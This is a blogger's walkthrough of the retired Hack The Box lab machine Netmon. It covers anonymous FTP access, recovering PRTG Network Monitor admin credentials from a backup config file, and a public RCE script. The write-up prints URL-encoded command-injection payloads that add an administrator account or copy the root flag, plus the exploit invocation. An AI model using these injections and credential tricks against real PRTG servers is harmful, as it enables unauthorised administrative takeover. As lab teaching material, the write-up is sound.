Hack The Box – Netmon Write-up By Nikhil Sahoo

Introduction

So again back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Netmon which retired very recently. It was actually a fairly easy box and was based on windows machine. Getting the user flag was damn easy and the root flag wasn’t that difficult as well. So let’s begin..

 

Recon

We’ll start with our recon by doing a nmap scan.

 

So as we can see from the results that the port 21 is open and it supports anonymous login.

So let’s connect to the ftp server by typing in the command:

ftp 10.10.10.152

After getting logged in, we can browse through different directories and sub directories and eventually we will come across the user flag which is present inside “/Users/Public/“.

 

We can download the user flag to our machine just by typing in :

get user.txt

 

Thus we got our user flag. Now let’s hunt for root flag.

So we know from our scanning results that port 80 is also open. So lets open it in our browser.

 

On opening it we will find out that it is a login portal of the PRTG Network monitor which is basically a network monitoring software from Paessler AG. You can find out more about this software by just googling it.

Now we need to login somehow so let’s explore the machine more via ftp. Coming back to the ftp we’ll find a directory named “ProgramData”. Move into this directory

 

On changing the directory we will find a sub directory named “Paessler”, so again move into this directory.

 

Now we will find a sub directory named “PRTG Network Monitor“.

 

On getting inside this we will find a file  named “PRTG Configuration.old.bak” so download this file into your machine.

 

We will try to explore this file in our machine. On exploring we will find the username: “prtgadmin” and password : “PrTg@dmin2018“.

 

Now let’s try these credentials in the login portal but unfortunately it won’t work. So let’s try changing the password to “PrTg@dmin2019″ and we are in.

On googling more about this we can find a script that exploits a RCE vulnerability in this monitoring framework and basically adds a user named “pentest” in the administrators group with the password “P3nT3st!”.

You can find the script here

So we will be using this script however a small change needs to be done before using it.

First we need to search the command which is responsible for creating a new user , so search for the below command in the code :

%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22 which is decoded as “C:\Users\Public\tester.txt;net user pentest P3nT3st! /add” .

Secondly search for the command which adds the created user pentest into the administrators group, so search for the below command as well:

%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22 which is decoded as  “C:\Users\Public\tester.txt;net localgroup administrators /add pentest

 

Now the whole point here is that we don’t want to create a new user and all, we just need the root flag which is present inside /Administrator directory as root.txt (same for all boxes) so replace the net user or net localgroup command with the following : “copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt” ….This command will copy the root flag present inside Administrator directory to the Public directory.

Here is the final command:

C:\Users\Public\tester.txt;copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt” which is encoded as %22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22

 

We just need to replace the above code with the two commands that we had selected earlier in the code.

We also need the cookies as well. So let’s move on to our browser press the f12 button for developer tools, select the network tab and select any request and press on the cookies tab and copy all the cookies. (The full syntax of how to execute the script is present in the above github code as well).

 

Here is the final command to execute,we just need to replace the cookies with our own:

./prtg-exploit.sh -u http://10.10.10.152 -c “_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

 

So hopefully everything got right, let’s check by going back to the box via ftp. Going inside C:\Users\Public\ directory we can find a text file named nikhil.txt. Download it and view it in your desktop.

 

Thus we got our root flag and the challenge was successfully completed.

So that’s for now. See you next time. Goodbye

You can have a look at my previous article on Hack The Box: Curling Writeup. Here is the link of the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff  ?

For any queries you can send a Hi to my Linkedin Handle: Here

 

 

.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *